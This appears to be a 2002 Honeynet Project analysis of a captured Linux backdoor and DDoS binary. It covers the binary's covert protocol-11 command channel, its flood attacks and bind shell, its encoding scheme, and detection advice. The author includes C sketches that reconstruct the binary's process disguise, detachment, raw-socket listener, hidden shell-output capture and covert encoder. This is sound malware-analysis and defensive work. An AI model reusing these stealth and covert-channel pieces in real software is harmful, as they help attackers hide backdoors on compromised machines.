27 May 2002

Binary Purpose

The binary captured by the HoneyNet Project appears to be a Linux-based combination backdoor and Distributed Denial of Service (DDoS) system. However, it contains no code to obtain root, so a machine must already be compromised before the tool can be used.

The binary appears to act as both a DDoS utility and a backdoor, all in one package. It can execute commands on a compromised host as well as launch several kinds of DoS attack. It is unclear which of these purposes the tool was primarily designed for.

One thing that stands out about this binary is its built-in anonymity. It can both execute commands and launch attacks without revealing the attacker's true source. Its network traffic is even encoded to obscure what the attacker is doing.

Binary Capabilities

There is one thing that makes this binary interesting: it is full of features. The Analysis document covers them in full detail; what follows is more or less a summary of that analysis:

Binary Analysis

We first check what kind of binary it is, using the "file" command:

This tells us that the binary's native OS was probably Linux. Because it was compiled for the 80386 and statically linked, it will most likely run on almost any x86 Linux machine.

Stripping the binary serves two purposes for a blackhat: it shrinks the file size but, more importantly, it makes disassembly *much* harder.

Disassembly

This is where all the hard work was done. A full static disassembly was performed (the binary was never executed) in an attempt to reconstruct its runtime structure.

The first step was to read e_entry from the ELF header:

Using the ELF header structure, we see that e_entry = 0x08048090 (see the Analysis document for more details).
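The e_entry lookup is easy to reproduce without special tools (readelf -h reports the same field as "Entry point address"). The following is a minimal C sketch, assuming a 32-bit little-endian ELF file such as the i386 the-binary; the function names elf32_le_entry and print_entry are hypothetical. It relies on the system's <elf.h> definitions, in which e_entry sits at byte offset 24 of an Elf32_Ehdr.

```c
#include <elf.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Extract e_entry from a 32-bit little-endian ELF header held in buf.
 * Returns 0 on success, -1 if buf does not hold such a header. */
int elf32_le_entry(const unsigned char *buf, size_t len, uint32_t *entry)
{
    const unsigned char *p;

    if (len < sizeof(Elf32_Ehdr) || memcmp(buf, ELFMAG, SELFMAG) != 0)
        return -1;
    if (buf[EI_CLASS] != ELFCLASS32 || buf[EI_DATA] != ELFDATA2LSB)
        return -1;
    p = buf + offsetof(Elf32_Ehdr, e_entry);      /* byte offset 24 */
    /* Decode explicitly as little-endian so the host byte order is irrelevant. */
    *entry = (uint32_t)p[0] | (uint32_t)p[1] << 8 |
             (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
    return 0;
}

/* Read the ELF header of the file at path and print its entry point. */
int print_entry(const char *path)
{
    unsigned char hdr[sizeof(Elf32_Ehdr)];
    uint32_t entry;
    size_t n;
    FILE *fp = fopen(path, "rb");

    if (fp == NULL)
        return -1;
    n = fread(hdr, 1, sizeof hdr, fp);
    fclose(fp);
    if (elf32_le_entry(hdr, n, &entry) != 0)
        return -1;
    printf("e_entry = 0x%08x\n", (unsigned)entry);
    return 0;
}
```

Run against the captured file, print_entry("the-binary") should report the 0x08048090 quoted above.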

Starting at this code point, GDB was used to disassemble the-binary. Nothing out of the ordinary was found in this section; in fact it followed a generic gcc-compiled layout, complete with startup, exit, and (empty) constructor/destructor sections.

The code beginning at 0x8048134 matches what C programmers would recognise as the start of "main()". It should be noted that, since the binary was stripped, no function could be identified by name, and each one had to be analysed line by line to work out what it does (this includes basic libc functions!). This was perhaps the most time-consuming part of the disassembly, and also the lengthiest to report on. As such, how the functions were followed, their purpose, and their assumed real names are not shown here; once again, they are in the Analysis document.

Startup

There are checks in place to ensure the binary is running as root; if it is not, it exits immediately.

argv[0] is replaced with a string "[mingetty]".

SIGCHLD is ignored and fork() is called twice. This detaches the binary from its original parent process: the surviving grandchild is re-parented to init.

The current directory is changed to "/".
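The startup sequence above maps onto ordinary libc calls. The C sketch below is a reconstruction under assumptions, not the binary's own code: the function names are hypothetical, and whether the original overwrote argv[0] in place exactly like this is not established by the disassembly summary. Note that a double fork re-parents the process to init but does not by itself start a new session; that would need setsid(), which is not mentioned above.

```c
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Non-zero if the process has an effective UID of 0 (the root check). */
int running_as_root(void)
{
    return geteuid() == 0;
}

/* Overwrite argv[0] in place so process listings show a fake name.
 * The fake name is truncated to the space the original argv[0] occupied;
 * the original terminating NUL keeps the result NUL-terminated. */
void disguise_argv0(char *argv0, const char *fake)
{
    size_t room = strlen(argv0);

    strncpy(argv0, fake, room);   /* pads with NULs if fake is shorter */
}

/* Ignore SIGCHLD, fork twice and move to "/". */
void detach(void)
{
    signal(SIGCHLD, SIG_IGN);     /* children are reaped automatically */
    if (fork() != 0)              /* original process (or fork failure) exits */
        exit(0);
    if (fork() != 0)              /* first child exits, orphaning the grandchild */
        exit(0);
    if (chdir("/") != 0)          /* do not keep the launch directory busy */
        exit(1);
}
```

In a main() this would run as: exit unless running_as_root(), then disguise_argv0(argv[0], "[mingetty]"), then detach().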

A socketcall that would look like this:

is made, giving the binary a raw socket that receives a copy of every incoming IP protocol 11 packet.

Another socketcall is executed that looks like this:

Here X is the previously created socket, Y is a buffer, and 0x800 (2048) is the maximum number of bytes read from each packet.
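Assuming the two socketcalls correspond to the usual socket() and recv() wrappers, they can be written in C roughly as follows; the function and macro names are hypothetical. On Linux, a raw IPv4 socket opened for a specific protocol receives a copy of every incoming packet with that protocol number, and the data returned includes the IP header. Opening it requires root (CAP_NET_RAW), which fits the root check at startup.

```c
#include <sys/types.h>
#include <sys/socket.h>

#define PROTO_COVERT 11      /* IP protocol number watched by the binary */
#define MAX_READ     0x800   /* maximum bytes read per packet */

/* First socketcall: a raw IPv4 socket for protocol 11. Returns -1 on error. */
int open_covert_socket(void)
{
    return socket(AF_INET, SOCK_RAW, PROTO_COVERT);
}

/* Second socketcall: read at most 0x800 bytes of one packet into buf.
 * On a raw IPv4 socket the returned data starts with the IP header. */
ssize_t read_covert_packet(int fd, unsigned char buf[MAX_READ])
{
    return recv(fd, buf, MAX_READ, 0);
}
```

The receive loop then checks each packet, sleeping briefly and calling read_covert_packet() again whenever a packet does not match.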

The recv()'d data is then checked to have the following properties:

If the packet satisfies all three conditions, it is decoded and processed. If it fails any of them, the binary sleeps briefly and jumps back to the recv(), forming what appears to be a never-ending loop.

Core Code

Assuming a matching packet, the function at 0x804a1e8 is called with the packet data as one of its parameters. This function was named Data_Manipulation_Function_A in the analysis document, where it is examined in fine detail. The analysis concluded that it is a data decoder, used to decode network traffic.

The decoded data is then interpreted in a loosely protocol-driven way. The deciding field of this 'protocol' is the second byte of the decoded data: the program checks it and jumps to different code depending on its value:

0x1 Status Request

Tells the controlling client what the tool is currently doing. It also sends what may be a binary ID or version number. The 'information' packet is sent using a special function that handles the covert nature of this tool's communications.

0x2 Blackhat Information

The blackhat's client is believed to be able to tell the tool what his/her IP address is. This is not as simple a process as it sounds: the author has placed at least 3 methods in the code that apply various techniques to obscure the blackhat's true source (or at least their next hop). These range from using no decoy packets to using up to 10 settable decoy packets.

0x3 Execute Shell Command

Starting at the very next byte, a string is read. This string is executed using csh, and redirected into a file "/tmp/.hj237349". This file is then opened, read, and the data sent via the tool's covert communications channel. The file is then removed.
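The run, capture, read back and delete pattern used by command 0x3 can be sketched in C as below. This is an illustration under stated assumptions: the command line the binary actually builds is not reproduced in this summary, so the format string, the function name run_and_capture and the shell parameter are hypothetical (the binary itself used csh). Only stdout is redirected here, and the output is returned to the caller rather than sent over the covert channel.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define CAPTURE_FILE "/tmp/.hj237349"   /* temporary file named in the text */

/* Run cmd via "shell -c", redirect its stdout to CAPTURE_FILE, read the file
 * back into out (NUL-terminated, at most outsz - 1 bytes) and delete it.
 * Returns the number of bytes read, or -1 on error. */
long run_and_capture(const char *shell, const char *cmd, char *out, size_t outsz)
{
    char line[1024];
    FILE *fp;
    size_t n;
    int len;

    if (outsz == 0)
        return -1;
    /* Naive quoting: a cmd containing a double quote would break this. */
    len = snprintf(line, sizeof line, "%s -c \"%s\" > %s", shell, cmd, CAPTURE_FILE);
    if (len < 0 || (size_t)len >= sizeof line)
        return -1;
    if (system(line) == -1)
        return -1;
    fp = fopen(CAPTURE_FILE, "r");
    if (fp == NULL)
        return -1;
    n = fread(out, 1, outsz - 1, fp);
    out[n] = '\0';
    fclose(fp);
    unlink(CAPTURE_FILE);               /* remove the evidence afterwards */
    return (long)n;
}
```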

0x4 Execute DNS Traffic Amplification Attack

This calls a function that was named Network_Function_C in the analysis document. The function was also disassembled and the traffic it produces analysed. It is believed to be a DoS attack that uses replies from over 11,000 preset DNS servers to consume a victim's bandwidth. Some details of the flood, such as the victim and source port number, can be specified in the same decoded data packet.

0x5 Execute Corrupt Packet Attack

Network_Function_D is called. This function creates what appear to be IP fragments, with the exact details taken from the rest of the decoded data packet.

0x6 Create a Bind Shell

This binds /bin/sh to port 23281. The port is not normally open, so the shell is not visible unless the blackhat specifically enables it via a protocol 11 packet.

0x7 Execute Command

Starting at the very next byte, a string is read. This string is executed using csh, but no output is kept.

0x8 Stop Executing

This appears to be able to stop whatever was started by commands 0x4, 0x5, 0x6, 0x9, 0xA, 0xB, and 0xC.

0x9 Execute DNS Traffic Amplification Attack (Timed)

This attack is the same as 0x4, except that it appears to allow the speed of the packet flow to be controlled.

0xA Execute SYN Flood Attack

This generates TCP SYN packets, once again using the rest of the decoded packet data to specify the victim, the destination port, and other parameters.

0xB Execute SYN Flood Attack (Timed)

Identical to 0xA, except that the blackhat can control the speed of the packet flow via the decoded data in the control packet.

0xC Execute DNS Request Flood

This attack is the inverse of the DNS Amplification Flood: it sends requests to a single nameserver (presumed to be the victim). The details of the attack are once again contained in the decoded data.
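The command handling described above amounts to a dispatch on the second byte of the decoded data. A minimal C sketch of that lookup follows; the table, the function name describe_command and the labels are hypothetical, taken from the headings above rather than from the binary, and how the real code treats values outside 0x1-0xC is not covered here.

```c
#include <stddef.h>

/* Command labels indexed by the second decoded byte (0x0 is unused). */
static const char *const command_names[] = {
    [0x1] = "Status Request",
    [0x2] = "Blackhat Information",
    [0x3] = "Execute Shell Command",
    [0x4] = "Execute DNS Traffic Amplification Attack",
    [0x5] = "Execute Corrupt Packet Attack",
    [0x6] = "Create a Bind Shell",
    [0x7] = "Execute Command",
    [0x8] = "Stop Executing",
    [0x9] = "Execute DNS Traffic Amplification Attack (Timed)",
    [0xA] = "Execute SYN Flood Attack",
    [0xB] = "Execute SYN Flood Attack (Timed)",
    [0xC] = "Execute DNS Request Flood",
};

/* Return the label for a decoded packet's command byte, or NULL if the
 * packet is too short or the byte is not one of the known commands. */
const char *describe_command(const unsigned char *decoded, size_t len)
{
    if (len < 2)
        return NULL;
    if (decoded[1] >= sizeof command_names / sizeof command_names[0])
        return NULL;
    return command_names[decoded[1]];   /* NULL for the unused 0x0 slot */
}
```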

Network Data Encoding Process

The communications channel between the blackhat and this tool looks to be encoded. All incoming packets that are processed by this binary are put through a decoder, and all outgoing packets are put through an encoder.

The disassembly analysis of Data_Manipulation_Function_A and Data_Manipulation_Function_B can be seen in the Analysis report. An explanation of how each works will be given here, along with a simple asm decoding routine.

The encoding/decoding process used by the binary is extremely simple. The binary's asm routines (and, presumably, the C code that generated them) are most certainly NOT simple, however. It is quite possible that the author of this tool deliberately obfuscated these two functions with extra variables, buffers, and function calls to achieve what is possible in fewer than 15 lines of asm.

The encode routine (Data_Manipulation_Function_B) goes like this:

Original Data: A B C D

Encoded Byte 1 (EB1) = (A + 23) % 256

Encoded Byte 2 (EB2) = ((A + 23) + B + 23) % 256 = (EB1 + B + 23) % 256

Encoded Byte 3 (EB3) = (((A + 23) + B + 23) + C + 23) % 256 = (EB2 + C + 23) % 256

etc...

The decode routine (Data_Manipulation_Function_A) looks like:

Encoded Data: A B C D

Decoded Byte 1 = A - 23 + (X * 256)

Decoded Byte 2 = B - A - 23 + (X * 256)

Decoded Byte 3 = C - B - 23 + (X * 256)

etc..

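where X is whichever integer brings the result into the range 0-255 (in other words, each subtraction is taken modulo 256). Note that A, B, C, D here are the encoded bytes, not the original data used above.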
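The two formulas above fit in a few lines of C. This is a sketch of the summarised algorithm only, not a reconstruction of the binary's convoluted routines; the names covert_encode, covert_decode and COVERT_KEY are hypothetical. As a hand-worked check, the plaintext bytes 0x00 0x02 encode to 23 and 48 (23, then 23 + 2 + 23).

```c
#include <stddef.h>

#define COVERT_KEY 23   /* constant added to every byte */

/* Encoder, as summarised for Data_Manipulation_Function_B:
 * out[0] = in[0] + 23, out[i] = out[i-1] + in[i] + 23, all mod 256. */
void covert_encode(const unsigned char *in, unsigned char *out, size_t len)
{
    unsigned char prev = 0;

    for (size_t i = 0; i < len; i++) {
        prev = (unsigned char)(prev + in[i] + COVERT_KEY);   /* wraps mod 256 */
        out[i] = prev;
    }
}

/* Decoder, as summarised for Data_Manipulation_Function_A:
 * out[0] = in[0] - 23, out[i] = in[i] - in[i-1] - 23, all mod 256.
 * Converting to unsigned char supplies the "+ (X * 256)" term. */
void covert_decode(const unsigned char *in, unsigned char *out, size_t len)
{
    unsigned char prev = 0;

    for (size_t i = 0; i < len; i++) {
        unsigned char cur = in[i];          /* save before out[i] may overwrite it */
        out[i] = (unsigned char)(cur - prev - COVERT_KEY);
        prev = cur;
    }
}
```

Because each input byte is read before the matching output byte is written, both functions also work in place (in == out).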

This makes the whole thing incredibly simple, yet working this process out from the binary's actual assembly took hours. The decoding function calls functions believed to be strcpy() and sprintf(), and it also uses 2 nested loops. The strange thing about these is that one simply overwrites the other, making it redundant. Then an sprintf() is called which overwrites the second loop's output..... :)

This is quite likely to have been an obfuscation method, designed to make the decoding process more complex. Then again, it could just be really hopeless code...

The technique described above is a simplistic form of modulus (mod 256) encoding. While this kind of technique is well known, no algorithm matching the one used could be found (especially one involving sprintf and strcpy!). The choice of the value 23 seems odd, since it doesn't match up to anything specific. It may act as a form of 'key' for the encode/decode process, in which case other versions of this tool using different 'keys' could well exist.

The simplistic nature of this algorithm was only found by accident. The intention was to write a decoder based on Data_Manipulation_Function_A. Fortunately, one optimisation of that code led to another, and eventually the code gave up all of its secrets:

A decoder for this tool has been included. covert_decode.c is a packet decoder for use with pcap-stored dump files such as those used by tcpdump and snort.

exploit-dev:/reverse# ./covert_decode -f snort.log

*snip!*

Blackhat DDOS Packet:
172.16.196.132 -> 172.16.183.2
CONTROL PACKET:
[Blackhat Source - "203.173.144.35"]
==========================================================
Blackhat DDOS Packet:
172.16.196.132 -> 172.16.183.2
CONTROL PACKET:
[Covert Shell Command - "rpcinfo -p 127.0.0.1"]
==========================================================

*snip!*

The above decode shows two control packets. The first tells the tool that the blackhat wishes responses to be directed to 203.173.144.35; the second shows the blackhat executing an rpcinfo command on the local box. Further decodes reveal that the IP address seen in the "Blackhat Source" packet is indeed one of 9 destinations for outgoing covert packets.

Binary Network Traffic Detection

Detection of traffic associated with this type of tool is quite complex. There is a simple answer, and a long one.

Simple answer:

Any non-generic IP protocol (i.e. anything other than TCP/UDP/ICMP/IGMP) can potentially carry communications for this tool. Detecting these protocols is best left to network sniffers such as tcpdump/snort. If snort rulesets can be set up to log non-generic protocols (and if they cannot, perhaps they will be able to in future), doing so may be a good idea. I do not believe it is possible to specify a particular protocol in a snort rule, at least not with the (quite old) version I have.

A temporary measure may be as simple as logging all IP traffic, and then simply grepping out the known packets. A good start may even be to simply analyse network traffic for protocol 11 packets. The included covert_decode.c should be able to do this!
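covert_decode.c itself is not reproduced here. As a rough illustration of the first filtering step only, the C sketch below tests whether a captured Ethernet II frame carries an IPv4 packet with protocol 11; the function name is hypothetical, and VLAN-tagged frames and other link types are deliberately ignored. For a quick look without writing code, the standard tcpdump filter expression "ip proto 11" (for example tcpdump -r snort.log 'ip proto 11') selects the same packets from a capture file.

```c
#include <stddef.h>

#define ETH_HDR_LEN     14       /* Ethernet II header, no VLAN tag */
#define ETHERTYPE_IPV4  0x0800
#define IP_PROTO_COVERT 11

/* Return 1 if the frame carries IPv4 with protocol field 11, else 0. */
int is_proto11_frame(const unsigned char *frame, size_t len)
{
    const unsigned char *ip = frame + ETH_HDR_LEN;

    if (len < ETH_HDR_LEN + 20)                       /* minimal IPv4 header */
        return 0;
    if (((frame[12] << 8) | frame[13]) != ETHERTYPE_IPV4)
        return 0;
    if ((ip[0] >> 4) != 4)                            /* IP version field */
        return 0;
    return ip[9] == IP_PROTO_COVERT;                  /* protocol field */
}
```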

Another way to use traffic sniffers/analysers would be to watch for ICMP unreachable errors. Since the tool sends its outgoing packets to several addresses, some of those addresses will undoubtedly belong to live hosts. Most of these hosts would be expected to reply with an ICMP Destination Unreachable, Protocol Unreachable message (Type 3, Code 2). A stream of these errors directed at a particular host could indicate that it is compromised.
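The ICMP check can be sketched the same way. The C function below (name hypothetical) takes an IPv4 packet starting at its IP header and reports whether it is a Type 3, Code 2 error whose quoted original header carries protocol 11, which ties the error to this tool's traffic rather than to any protocol-unreachable message. In a capture file, the tcpdump expression "icmp[icmptype] == 3 and icmp[icmpcode] == 2" gives a similar first cut.

```c
#include <stddef.h>

/* Return 1 if ip[] is an ICMP Protocol Unreachable (type 3, code 2) whose
 * quoted original IP header has protocol 11, else 0. */
int is_proto11_unreachable(const unsigned char *ip, size_t len)
{
    size_t ihl, quoted;

    if (len < 20 || (ip[0] >> 4) != 4 || ip[9] != 1)   /* 1 = ICMP */
        return 0;
    ihl = (size_t)(ip[0] & 0x0F) * 4;                  /* outer header length */
    if (ihl < 20 || len < ihl + 8 + 20)                /* ICMP header + quoted IP header */
        return 0;
    if (ip[ihl] != 3 || ip[ihl + 1] != 2)              /* type 3, code 2 */
        return 0;
    quoted = ihl + 8;                                  /* after the 8-byte ICMP header */
    return ip[quoted + 9] == 11;                       /* quoted protocol field */
}
```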

Long answer:

The problem with this tool is that it could easily be adapted to use known protocols such as TCP/ICMP/UDP. This makes detection even more difficult. The future possibilities for tools such as this one are limitless, with backdoor communications able to be passed across valid packets such as DNS or WWW requests. Future traffic detection of these sorts of tools is a difficult topic to tackle. It may be that detection will unfortunately be limited to detecting known configurations of various blackhat tools.

Current Tools:

Some network 'loggers' and 'sniffers' only listen for generic protocols, and some will not even pick up packets such as those used by this particular binary. This is often not the fault of those packages, since they were not designed to capture all traffic. The problem is that people using these packages may believe they are seeing everything on their network.

Firewalls *should* help protect against these tools. They will most certainly defend against the captured binary, and probably against many future versions of it. The only downside is that an improperly configured firewall may lead to a false sense of security when dealing with these tools.

As long as a very simple firewall principle is followed, intruders will have an extremely hard time implementing these types of tools to backdoor / abuse a network. This same principle should be nothing new:

"A firewall should block everything from a network except known traffic."

The question is, why do so many people still not do this? ...

Binary Protection

The captured binary was analysed expecting the absolute worst in tricky behavior. It was not run-time tested, it was not altered in any way to direct flows, and above all, NOTHING was assumed without reason. The binary was analysed, starting from e_entry to exit, looking for anything that could possibly be a trick.

Alas, nothing really difficult was found - I thought this was a challenge?!?! :)

The single biggest anti-reverse-engineering feature is the stripping of the symbols. It is quite likely that this was done deliberately for this very effect. It meant that many calls, even the most basic ones, had to be disassembled along with the author's code to see what each did. In some cases these 'basic' functions are so complex that I personally could not guarantee that code X was definitely function Y. In the Analysis, explanations for assumptions have been given where possible. In the end:

It is understood that tools exist that can recognise some of these functions, particularly libc ones. Unfortunately I like doing things the hard (and precise) way :)

The second biggest difficulty, also probably deliberate, is the use of high compiler optimisation levels. Compiling with optimisations often produces strange-looking assembly, and some function calls may be discarded in favour of shorter inline code. Some examples:

The compiler optimisations would also presumably hamper function-recognition tools. While none were used here, it seems fair to assume that they would have at least some difficulty recognising the altered code (if I'm wrong on this, I apologise to the authors of those tools).

Lastly, and perhaps accidentally, the encoding/decoding functions in this binary look to have been obfuscated. Particularly in Data_Manipulation_Function_A (the decoder), extra function calls and loops appear to have been added. These loops do things like "A = B; C = B; A = C;". That is, they serve absolutely no purpose, and in some cases they even undo each other! They most certainly put me in a position where I was prepared not even to *try* to analyse the logic of those functions. It must also be recognised that the author could simply be a dope; you decide.

Similar Tools

Loki

One of the first publicly discussed covert communication tools appeared way back in 1996 in Phrack 49. It was written by daemon9 and named Loki.

The concept is somewhat old now: it was based on sending data over ICMP echo/echo_reply packets, because these were unlikely to be firewalled. Towards the end of that text:

Indeed, any protocol is vulnerable to covert data tunneling, and the author of this code has used that to his/her advantage.

TFN (Tribe Flood Network)

A very similar DDoS tool to this one is TFN. There are many, many similarities between this tool and TFN. Some feature similarities (from the tfn2k readme):

These similarities prompt one to consider this tool to simply be a revamped TFN2k. Indeed, there are even code similarities:

While coding structures cannot be reconstructed perfectly from disassembly code, it can be pieced together well enough to indicate that little (if any) code from TFN/TFN2k appears to have been used in the construction of this tool. Even the packet construction code differs, not just in the order but even in memory assignments and socket construction.

The ideas of the two however seem very similar, suggesting a copying of 'ideas' from TFN2k. The strange thing about the two tools is that one uses excellent code for one area (encryption for instance), and the other uses excellent routines for another (such as DDoS attacks). To assume one was created or derived from another leaves more questions than it answers.

Author Information

Unfortunately very little about the author can be obtained through the binary. We can get some technical details by running strings:

These details point to a Linux machine that is at least 3-4 years old. This could also simply mean that an old Linux machine was compromised and then used to compile the binary. Or there's always the unthinkable: that this binary really is 3-4 years old?

Searching Google for various strings from the binary turns up one post of interest:

This Linux machine appears to have been a victim as early as August 2001, so one can assume this tool has been doing the rounds in some form for at least a year. Since it appears to have gone undetected (or at least unreported) for so long, this may say something about the skill level of the author(s)/user(s).

The design of the binary is also quite interesting. It raises speculation about the author/user relationship:

These two points indicate that the author of the code is probably actively involved in both the ongoing development and the propagation of the tool.

As for the design / coding skills of the author:

Nonetheless, the author(s) do appear to have planned and coded the binary well.

Since the author is quite likely also a user of the tool, it would be interesting to see what interactions they had with the honeypot while it was infected.

Future Advancements

This tool displays some attributes similar to those of known tools with the same purpose. Its use of an unusual protocol could be seen as an advancement over them (or, equally, as a step backwards). DNS amplification attacks were first officially reported by AusCERT as early as 1999. The fact that they are still in use today suggests this particular flood isn't going away anytime soon.

With this in mind, future advancements of this tool are expected to be stealth-based rather than attack-based. Network traffic could undoubtedly be made to look like legitimate traffic, making communications between the blackhat and these DDoS/backdoor tools even harder to detect.

The encryption system used in this binary is simplistic at best, and has really left the attacker open to sniffing by purpose-built sniffers. There are many encryption systems publicly available that would make this tool extremely difficult to deal with.

One must realise that there could be much more to this tool than this single binary. If it has indeed been built on ideas from older products of a similar nature, it may use a hierarchy of hosts to conceal the blackhat's identity. Packets to this binary have a minimum size of 220 bytes, making sending commands to many hosts a time-consuming task. Other DDoS tools have used amplifier machines in the past to simplify (and anonymise) this task, something which is possibly already being done (and if not, should be expected). Perhaps the honeynet has an amplifier binary for a future reverse challenge? :)